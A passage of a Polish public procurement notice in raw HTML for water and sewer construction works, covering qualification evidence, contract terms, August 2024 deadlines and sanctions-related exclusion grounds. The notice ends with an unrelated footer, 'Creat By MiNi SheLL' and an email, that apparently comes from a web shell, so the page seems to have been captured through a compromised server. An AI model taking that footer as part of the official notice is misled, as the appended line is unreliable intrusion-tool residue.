i urządzeń wodociągowych, kanalizacyjnych o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/><br/>UWAGA dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi/roboty budowlane, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty OŚWIADCZENIE, z którego wynika, które usługi/roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty wykonawca<br/>dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez<br/>zamawiającego (sporządzone wg wzoru stanowiącego załącznik nr 2 i 3 do SWZ). Oświadczenie to stanowi dowód potwierdzający<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu w zakresie<br/>wskazanym przez zamawiającego (sporządzone wg wzoru stanowiącego załącznik nr 2 i 3 do SWZ). Oświadczenie to stanowi<br/>dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert.<br/>2) Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni, następujących aktualnych na dzień złożenia podmiotowych środków dowodowych<br/>w celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia publicznego oraz spełniania<br/>warunków udziału w postępowaniu o udzielenie zamówienia publicznego:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2023 r. poz. 1689 z późn. zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej (załącznik nr 6 do SWZ),<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 7 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są, zgodnie z art. 58 ust. 2 ustawy, do<br/>ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą pełnomocnictwa.<br/>3) Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.<br/>4) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wraz z ofertą oświadczenie, o którym mowa w art.<br/>117 ust. 4 ustawy (wzór stanowi załącznik nr 4 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wzór umowy stanowiący załącznik do Specyfikacji Warunków Zamówienia zawiera projektowane postanowienia umowy w<br/>sprawie zamówienia publicznego. W treści umowy podano wszelkie istotne dla zamawiającego warunki realizacji<br/>zamówienia oraz dopuszczalne zmiany postanowień umowy w zakresie przedmiotu zamówienia, terminu realizacji i<br/>wynagrodzenia Wykonawcy. Dopuszcza się ponadto w porozumieniu z wykonawcą wprowadzenie do treści umowy<br/>drobnych zmian i korekt, jednak wyłącznie w zakresie niepowodującym istotnych zmian przedstawionych warunków<br/>handlowych niekorzystnych dla zamawiającego <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-08 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Podstawy wykluczenia, o których mowa w art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>Z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września<br/>2019 r. – Prawo zamówień publicznych wyklucza się:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006 r.<br/>dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy<br/>(Dz. Urz. UE L 134 z 20.05.2006, str. 1 z późn. zm.) i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w<br/>sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i<br/>niezależność Ukrainy lub im zagrażających (Dz. U. L 78 z 17.03.2014, s. 6 z późn. zm.) albo wpisanego na listę na<br/>podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507);<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu<br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2023 r. poz. 1124 z późn. zm.) jest osoba wymieniona w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem<br/>rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 z późn. zm.) jest podmiot wymieniony w wykazach określonych<br/>w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia<br/>24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com